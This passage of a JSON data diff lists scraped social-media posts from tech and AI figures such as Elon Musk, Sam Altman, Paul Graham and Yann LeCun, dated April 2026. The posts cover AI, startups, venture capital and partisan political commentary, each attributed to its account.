"@GaryMarcus", + "name": "Gary Marcus", + "title": "Coders and software engineers ONLY:", + "url": "https://nitter.net/GaryMarcus/status/2048544989769257024#m", + "published_at": "2026-04-26T23:29:20+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Remember this", + "url": "https://nitter.net/elonmusk/status/2048543344746250466#m", + "published_at": "2026-04-26T23:22:48+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grad school indoctrination camps", + "url": "https://nitter.net/elonmusk/status/2048535299102265720#m", + "published_at": "2026-04-26T22:50:49+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "We hired someone for the investing team. \n\nSomething I never planned to do. \n\nThey sent the team 3 new deals per day for 90 days straight. \n\nAll aligned to our stage, geography and deal type. \n\nThat’s how you hustle and get a job in VC. \n\nStay tuned. Reveal to come.", + "url": "https://nitter.net/HarryStebbings/status/2048531257399664920#m", + "published_at": "2026-04-26T22:34:46+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets.\n\nHe predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky.\n\nThe scary part: he retweeted every mainstream Democrat on this platform.\n\nThread below. 👇\n\nWhat radicalized him were the same talking points repeated every day on the left.", + "url": "https://nitter.net/KanekoaTheGreat/status/2048512831692452091#m", + "published_at": "2026-04-26T21:21:33+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", + "url": "https://nitter.net/DavidSacks/status/2048502978626113625#m", + "published_at": "2026-04-26T20:42:24+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "getting so much phishing email in my X DMs. \n\neither a lot of accounts have been hacked or someone has discovered a back door to posting DMs.", + "url": "https://nitter.net/GaryMarcus/status/2048500820350750905#m", + "published_at": "2026-04-26T20:33:49+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’ve invested in 700 private companies \n\nProviding liquidity and loans to high performing founders is completely standard. \n\nIn fact, investors encourage loans and secondary sales for founders to enable them to go for the Gold — which is exactly what SpaceX has done. \n\nThe @NYTimesPR is presenting this as a controversy, when in fact it’s the private company playbook in 2026. \n\nAnother hit job from the NYT", + "url": "https://nitter.net/Jason/status/2048487905543237675#m", + "published_at": "2026-04-26T19:42:30+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 of the best CEOs of the last 10 years. \n\nAdam Foroughi, Founder @AppLovin is easily top 3, ever. \n\n$160BN Market Cap \n\n$5.48BN Revenue\n\n$10M EBITDA per head \n\n82%+ margins\n\nJust 450 people in core business 🤯 \n\nNo other business on the planet has numbers like this. \n\nEpisode tomorrow 👇", + "url": "https://nitter.net/HarryStebbings/status/2048486182904852537#m", + "published_at": "2026-04-26T19:35:39+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs, lower unemployment, higher GDP in Democratic administrations than every GOP administration in the last 3 decades. Without fail.", + "url": "https://nitter.net/briantylercohen/status/2048469956627468510#m", + "published_at": "2026-04-26T18:31:11+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Ok @Acosta, balls in your court", + "url": "https://nitter.net/Jason/status/2048465651723882972#m", + "published_at": "2026-04-26T18:14:04+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare.\n\nDisgraziad", + "url": "https://nitter.net/Jason/status/2048463405590225173#m", + "published_at": "2026-04-26T18:05:09+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Accurate", + "url": "https://nitter.net/elonmusk/status/2048456433981591867#m", + "published_at": "2026-04-26T17:37:26+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Accurate", + "url": "https://nitter.net/elonmusk/status/2048456433981591867#m", + "published_at": "2026-04-26T17:37:26+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The only people who believe any of this are non-coders.\n\nI tried to build a game (an area I’m an n00b in.) The results are amusingly disastrous - I never before coded a decent game.\n\nBut I’ll crack out backend services w AI rapidly - because I coded dozens of them before…", + "url": "https://nitter.net/GergelyOrosz/status/2048454331645481034#m", + "published_at": "2026-04-26T17:29:05+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Falcon 9 launches 25 @Starlink satellites from California", + "url": "https://nitter.net/SpaceX/status/2048453949381091634#m", + "published_at": "2026-04-26T17:27:34+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950.\n\nThe National Science Board is the independent body that oversees the National Science Foundation, the agency that distributes $9 billion in research grants every year. \n\nIts members are scientists and engineers from universities and industry. They serve six-year staggered terms specifically so they cross presidential administrations and stay independent of whoever is in power.\n\nOn Friday, every single one of them got the same boilerplate email from Mary Sprowls of the Presidential Personnel Office: \"On behalf of President Donald J Trump, I am writing to inform you that your position as a member of the National Science Board is terminated, effective immediately. Thank you for your service.\"\n\nThat's it. That's the whole letter. For 76 years of institutional independence.\n\nThe NSF funds the basic science behind MRIs. Cellphones. LASIK eye surgery. GPS. The internet itself. The Antarctic research stations. The deep-space telescopes. The research vessels mapping the ocean floor. Every breakthrough that made America the world's leader in science for the better part of a century traces back through grants this agency made and this board approved.\n\nThe board chair, Victor McCrary, was actively advising Congress on Trump's proposed 55% cut to NSF's budget. The board was helping fight back. So Trump fired the board.\n\nMarvi Matos Rodriguez, one of the fired members, told reporters she had been reviewing an 80-page report as part of her board duties just days before being terminated. \n\nKeivan Stassun, a physicist at Vanderbilt, said NSF's leadership had already stopped responding to board oversight requests months ago. \"We would ask them, 'Are you following board governance directives?' And their answer would be, in effect, 'We don't listen to you anymore.'\"\n\nNow there's no board to answer to.\n\nRep. Zoe Lofgren of California, the top Democrat on the House Science Committee, called it \"the latest stupid move made by a president who continues to harm science and American innovation. Will the president fill the NSB with MAGA loyalists who won't stand up to him as he hands over our leadership in science to our adversaries?\"\n\nThat's the actual question. \n\nBecause while Trump is firing American scientists, China is building research universities at a rate we cannot match. The CDC just buried a study showing vaccines work.\n\n RFK Jr. runs HHS. The EPA is gutted. The Forest Service is being broken. Half of American children are breathing dangerous air. And now the people who decide what gets researched in the United States have all been fired by email on a Friday afternoon.", + "url": "https://nitter.net/Gianl1974/status/2048453901930660058#m", + "published_at": "2026-04-26T17:27:23+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Who made this?!", + "url": "https://nitter.net/Jason/status/2048450286902235560#m", + "published_at": "2026-04-26T17:13:01+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: In shocking news, calling your political opponents Nazis makes crazy people want to kill them. Who could have predicted this?", + "url": "https://nitter.net/KonstantinKisin/status/2048448438715445382#m", + "published_at": "2026-04-26T17:05:40+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th \n\n$100,000 cash prize \n\nVegas \n\n3, 3 minute rounds", + "url": "https://nitter.net/Jason/status/2048437340218044499#m", + "published_at": "2026-04-26T16:21:34+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers", + "url": "https://nitter.net/Jason/status/2048436081725464959#m", + "published_at": "2026-04-26T16:16:34+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.”\n\nAmong very conservative people it’s just 3%.\n\nIn other words, the far left is 8x more likely to support political violence as the far right.\n\nStop pretending this is a “both sides” problem. It’s not.", + "url": "https://nitter.net/RobertMSterling/status/2048435593244237849#m", + "published_at": "2026-04-26T16:14:38+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. \n\nPoliticians never waste a good fake crisis, which is why they're perfect for Bernie to try to seize the means of production back from the private sphere.\n\nImagine if a mainstream politician put the Heaven's Gate suicide cult on the platform in 1997?\n\nThat's where we are in American politics at the edges today. \n\nWe've jumped the shark into the absurd and we've completely lost the thread of reality in America today.\n\nAnd it isn't AI that caused this madness. It is good old fashioned human hallucination, story telling and delusion.\n\nSociety should never make policy about imaginary future threats that have no actual basis in reality. AI is already used by billions and it is nothing like what people imagined it to be and we're all still here and the problems have been ridiculously minimal even by the standards of past tech revolutions.\n\nIf I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? The answer is yes because it's cars. You probably got in one today and accepted that risk and never even thought about it.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. It's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nIf the pause AI cult had their way we'd still be stuck on GPT2 which was a hallucinating mess and we'd have made no progress to the much more sound and highly aligned and intelligent and useful models we have now.\n\nThat's because you can't make progress by imagining it in your mind or writing idiotic essays on Less Wrong to other mental masturbators. \n\nYou solve problems in the real world through trial and error. \n\nThe way to make AI safe is by building it and iterating in the real world. \n\nThere is no other way.", + "url": "https://nitter.net/Dan_Jeffries1/status/2048432684930654430#m", + "published_at": "2026-04-26T16:03:04+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "If they’re willing to die to assassinate, imagine what they will do if they gain political power", + "url": "https://nitter.net/elonmusk/status/2048428921536868583#m", + "published_at": "2026-04-26T15:48:07+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", + "url": "https://nitter.net/sama/status/2048428561481265539#m", + "published_at": "2026-04-26T15:46:41+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Deployment of 25 @Starlink satellites confirmed", + "url": "https://nitter.net/SpaceX/status/2048427420366324024#m", + "published_at": "2026-04-26T15:42:09+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"post-AGI, no one is going to work and the economy is going to collapse\"\n\n\"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stretches and miss out on working\"", + "url": "https://nitter.net/sama/status/2048426122854228141#m", + "published_at": "2026-04-26T15:37:00+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Seeing two types of founders emerge in this moment:\n\nThe tourists and the terminators. \n\nThe terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want it more than ever. \n\nThe tourists. They want to sell. They are scared. They do not want to commit 10 years to such uncertainty. \n\nPack is separating.", + "url": "https://nitter.net/HarryStebbings/status/2048418806867870115#m", + "published_at": "2026-04-26T15:07:55+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns.\n\nIn one post he calls President Trump the Antichrist.\n\nIn another he recommends buying guns in reaction to Trump’s DOJ exploring ways to ban firearm purchases from transgenders.\n\nIn one post he calls Trump a sociopathic mob boss and in another referred to him as a traitor with known connections to Putin, repeating a favorite leftwing Russian Hoax talking point.\n\nHe also attacks JD Vance for advocating an end to America’s funding the war in Ukraine and for his criticisms of the Pope. He seems pretty fixated on Ukraine more generally.\n\nHe also frequently interacts with Will Stancil’s Bluesky account, among others.", + "url": "https://nitter.net/AndrewKolvet/status/2048417712439689346#m", + "published_at": "2026-04-26T15:03:35+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one.\n\nGPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it.\n\nWhole new business opportunity here for the taking.", + "url": "https://nitter.net/DennisonBertram/status/2048413815675539816#m", + "published_at": "2026-04-26T14:48:06+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought to at least try to keep the site clean.", + "url": "https://nitter.net/paulg/status/2048413578789634100#m", + "published_at": "2026-04-26T14:47:09+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Durer was the original Dr Seuss.", + "url": "https://nitter.net/paulg/status/2048411898081583547#m", + "published_at": "2026-04-26T14:40:28+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I'm still just as afraid of making mistakes.", + "url": "https://nitter.net/paulg/status/2048411021329453562#m", + "published_at": "2026-04-26T14:36:59+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "The best founders I know all text their investors. \n\nNone of them email them. \n\nThe relationship will blossom and deepen in a matter of messages.", + "url": "https://nitter.net/HarryStebbings/status/2048400836024283246#m", + "published_at": "2026-04-26T13:56:31+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Random pic of @Jason protecting our $TAO bags", + "url": "https://nitter.net/nordin_eth/status/2048399674269213067#m", + "published_at": "2026-04-26T13:51:54+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "Shooting oneself in the foot?\nNope.\nShooting oneself in the prefrontal cortex.", + "url": "https://nitter.net/ylecun/status/2048399621492236615#m", + "published_at": "2026-04-26T13:51:41+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank\nhttps://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-call-to-sanction-israel-over-west-bank/0000019d-c950-d11b-a7df-ef5a5fba0000", + "url": "https://nitter.net/haaretzcom/status/2048396013816152216#m", + "published_at": "2026-04-26T13:37:21+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: How do you think the left redistributes wealth?\n\nViolence\n\nHow do you think the left seizes the means of production?\n\nViolence\n\nHow do you think they censor and surveil opponents?\n\nViolence\n\nWhat do you think the left means by “the struggle”?\n\nViolence", + "url": "https://nitter.net/TheAliceSmith/status/2048390094529216982#m", + "published_at": "2026-04-26T13:13:50+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Good use of camouflage by Biscuit.", + "url": "https://nitter.net/paulg/status/2048370801833828507#m", + "published_at": "2026-04-26T11:57:10+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in his debut ran 1:59:41 to become 2nd fastest alltime, while Jacob Kiplimo 🇺🇬 finished in 2:00:28.\n\nAll under the previous World Record.", + "url": "https://nitter.net/TrackGazette/status/2048351736037826877#m", + "published_at": "2026-04-26T10:41:25+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories.\n\nIf you're on either side of this slider, congratulations, you may be a child in an adult costume body!\n\nBlack and white thinking is for children. \n\nWhen you become an adult it's time to put away childish things.", + "url": "https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m", + "published_at": "2026-04-26T06:48:29+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Yeah", + "url": "https://nitter.net/elonmusk/status/2048271866914083172#m", + "published_at": "2026-04-26T05:24:02+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Major", + "url": "https://nitter.net/elonmusk/status/2048271324577952130#m", + "published_at": "2026-04-26T05:21:53+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: FSD v14.3.2 has been driving me all over LA tonight.\n\nThis build is f-ing incredible, smooth as butter and it’s fascinating how well it can handle complex traffic scenarios, road closures and tight roads. \n\nBest FSD build ever, holy shit. Tesla cooked here.", + "url": "https://nitter.net/BLKMDL3/status/2048267000359874797#m", + "published_at": "2026-04-26T05:04:42+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: \"You can make an AI go insane if you force it to believe things that aren't true - AI must be maximally truth-seeking\"\n\n—Elon Musk", + "url": "https://nitter.net/XFreeze/status/2048266495059181608#m", + "published_at": "2026-04-26T05:02:42+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: \"Left wing violence is the problem in America. Charlie Kirk was murde*ed by a left wing radical. President was almost kil*ed. We have a real crisis where there are far too many left wing people who don't want to disagree, but want to try kill their fellow citizens\"\n\n一 JD Vance", + "url": "https://nitter.net/cb_doge/status/2048262166671950249#m", + "published_at": "2026-04-26T04:45:30+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: This is true only if you start after 9/11, exclude all BLM rioting, and count all killings by white prison gangs - but not minority ones like the Black Guerilla Family and La Raza (\"The Race\") groups. \n\nLiterally. That is how you get this data. The mere fact that probably 40% of all murders annually are committed by Black members of organized street gangs/organizations ought to call it into question.\n\nRemember \"GIGO?\"", + "url": "https://nitter.net/wil_da_beast630/status/2048252497098080275#m", + "published_at": "2026-04-26T04:07:04+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The left has a serious violence problem, which @DavidSacks called out early and often. \n\nThis generation of woke democratic socialists are morally bankrupt. \n\nThey believe in looting and violence as a political tool — and they’re vocal about it. \n\nIf you called out the violent members of the January 6th riots, you also have to call out the radical left. \n\n#ballsandstrikes https://x.com/EndWokeness/status/2048217117221065201/video/1", + "url": "https://nitter.net/Jason/status/2048249992163242220#m", + "published_at": "2026-04-26T03:57:07+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "If you’re not condemning these lunatics, you’re advocating for the end of the American empire. \n\nI’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individuals, but selects them to represent their brands, shows exactly how bankrupt they are.", + "url": "https://nitter.net/Jason/status/2048247267182658004#m", + "published_at": "2026-04-26T03:46:17+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Heroes 🫡", + "url": "https://nitter.net/Jason/status/2048245718171648271#m", + "published_at": "2026-04-26T03:40:08+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Saturday song\n\nhttps://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0", + "url": "https://nitter.net/eladgil/status/2048230781739581745#m", + "published_at": "2026-04-26T02:40:47+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day", + "url": "https://nitter.net/SebastienBubeck/status/2048224374264885396#m", + "published_at": "2026-04-26T02:15:19+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "how can they write code so fast?!", + "url": "https://nitter.net/sama/status/2048165186482389253#m", + "published_at": "2026-04-25T22:20:08+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: (and we will fix the former)", + "url": "https://nitter.net/sama/status/2048160448340767038#m", + "published_at": "2026-04-25T22:01:18+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we still get looksmaxxed on frontend a little but we IQmog hard now", + "url": "https://nitter.net/sama/status/2048160404376105179#m", + "published_at": "2026-04-25T22:01:08+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "x.com/i/spaces/1nGeLyjZrkvKX", + "url": "https://nitter.net/Jason/status/2048151434928017429#m", + "published_at": "2026-04-25T21:25:29+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5TJjQ", + "url": "https://nitter.net/PhillyInquirer/status/2048118689258487857#m", + "published_at": "2026-04-25T19:15:22+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "nightmare blunt rotation", + "url": "https://nitter.net/Jason/status/2048116521436590260#m", + "published_at": "2026-04-25T19:06:45+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "today #knicks \n\n@mikal_bridges to 6th man/leads the bench in scoring \n\nKnicks play @23savage____ 26 minutes, he has 5 offensive boards \n\nWe're up 20+ points in the second half \n\n@ATLHawks backs broken; they realize we've figured it out \n\nseries over \n\n@nyknicks in six", + "url": "https://nitter.net/Jason/status/2048116362766127514#m", + "published_at": "2026-04-25T19:06:07+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to make sure that all of our industries do well. Crypto's a big industry.\"", + "url": "https://nitter.net/RapidResponse47/status/2048111588930986354#m", + "published_at": "2026-04-25T18:47:09+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: AngelList introduced USVC: venture investing for non-accredited investors starting at $500. Hear why Jason thinks the social media criticisms lack merit and says: \"More liquidity for investors is always a good thing. Let a thousand flowers bloom.”\n\nPlus:\n\n💰 Was the NYT wrong to host a discussion about “micro-looting”?\n\n🪖 A Special Forces soldier was insider trading on Polymarket… does it matter who he bet on?\n\n💵 Why rich families teach their kids about finance but public schools don’t.\n\nIt’s a TWiST Saturday special!\n\n0:00 Intro\n1:18 Naval's $500 VC Fund Explained\n5:54 Should You Trust Critics With 2K Followers?\n7:21 Learn By Betting — Jason's Philosophy\n10:10 Northwest Registered Agent - Get more when you start your business with Northwest. In 10 clicks and 10 minutes, you can form your company and walk away with a real business identity — Learn more at https://www.northwestregisteredagent.com/twist\n12:30 The Maduro Polymarket Scandal\n13:28 Should the Military Bet on Missions?\n19:55 LinkedIn Jobs - Hire right, the first time. Post your first job and get $100 off towards your job post at https://LinkedIn.com/twist\n29:32 NYT Defends Theft & \"Social Murder\"\n30:28 There Is No Moral Equivalence\n33:41 The Nepo Baby Behind the Article\n35:42 Prof G's \"Resist & Unsubscribe\" Movement\n37:54 Walk The Walk — Hasan, Bernie & Performative Outrage\n44:49 Teaching Kids About Money\n48:21 The Rich Get Richer & The Poor Stay Poor\n49:31 Outro\n\ncc: @Jason, @Lons, @AngelList, @Naval, @Polymarket, @nytimes\n\n🎥 Watch the full episode here 👇", + "url": "https://nitter.net/twistartups/status/2048099001782985057#m", + "published_at": "2026-04-25T17:57:08+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️\n\nBut over 470,000 pages were already preserved.\n\nThat history didn’t disappear.\nIt was archived.\n\n📚 Read VANISHING CULTURE to see why it matters\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new\n\n#VanishingCulture #DigitalMemory #InternetArchive #MTVNews #BookTwitter", + "url": "https://nitter.net/internetarchive/status/2048069805807128734#m", + "published_at": "2026-04-25T16:01:07+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "5.5 is so earnest\n\n\"little engine that could\" energy", + "url": "https://nitter.net/sama/status/2048062261584077149#m", + "published_at": "2026-04-25T15:31:08+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Another big reason why I don’t necessarily agree with changing the base designs, I think they’re perfect for a medium budget kids cartoon, Qwel’s new art style making them look more marshmallowy and cuddly proves that imo", + "url": "https://nitter.net/images_i_love3/status/2048061157685010444#m", + "published_at": "2026-04-25T15:26:45+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: The future of coding isn't reading lines of code. It's specifying outcomes and getting binaries back.\n\nElon said it. Aravind from Perplexity agrees. And startups are already making it a reality.\n\ncc: @elonmusk, @AravSrinivas, @Jason, @perplexity_ai, @ThisWeeknAI", + "url": "https://nitter.net/twistartups/status/2048057234865693125#m", + "published_at": "2026-04-25T15:11:10+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.", + "url": "https://nitter.net/NickKristof/status/2048043843690561556#m", + "published_at": "2026-04-25T14:17:57+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI\n\nFrom David Sacks\n\n\"Historically we only had two good exits for software businesses. One was IPO. The other was M&A. Then these big private equity shops came along and gave us a third potential exit. You would sell to them and then they would raise the capital based on one third equity and two third debt. So it was debt financed buyouts. \n\nIt is something that has been around in the non technology part of the economy for a long time but was a relatively new entrant in the world of technology. And the reason for that is if you have debt financed a purchase, you need to have very stable cash flows. \n\nBecause if you miss and you cant pay your interest on the debt, you will lose all your equity because the debt holders will foreclose. \n\nIt was belief for a long time that software did have predictable cash flows, at least for the mature businesses.\"", + "url": "https://nitter.net/BoringBiz_/status/2048037985765949537#m", + "published_at": "2026-04-25T13:54:41+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Edith and Shahed from Noora Health came to visit. They've saved over 75,000 lives so far. A small city of people.", + "url": "https://nitter.net/paulg/status/2048024967996993760#m", + "published_at": "2026-04-25T13:02:57+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. \n\nFounders, particularly first time founders, need to sear this into their brains. Don't mistake one tier for another. Be precise, and always be truthful.", + "url": "https://nitter.net/garrytan/status/2048017824895909901#m", + "published_at": "2026-04-25T12:34:34+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Whoah, self-driving cars compete with airlines. I never considered that till now.", + "url": "https://nitter.net/paulg/status/2048017345000415744#m", + "published_at": "2026-04-25T12:32:40+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like there was some kind of mental block.”-Terence Tao https://www.scientificamerican.com/article/amateur-armed-with-chatgpt-vibe-maths-a-60-year-old-problem/", + "url": "https://nitter.net/Ananyo/status/2047992864118894954#m", + "published_at": "2026-04-25T10:55:23+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: GitHub outages since Microsoft acquisition 🤣", + "url": "https://nitter.net/vaggelisdrak/status/2047957234664030380#m", + "published_at": "2026-04-25T08:33:48+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Hamming's talk is so important that I reproduced it on my site. 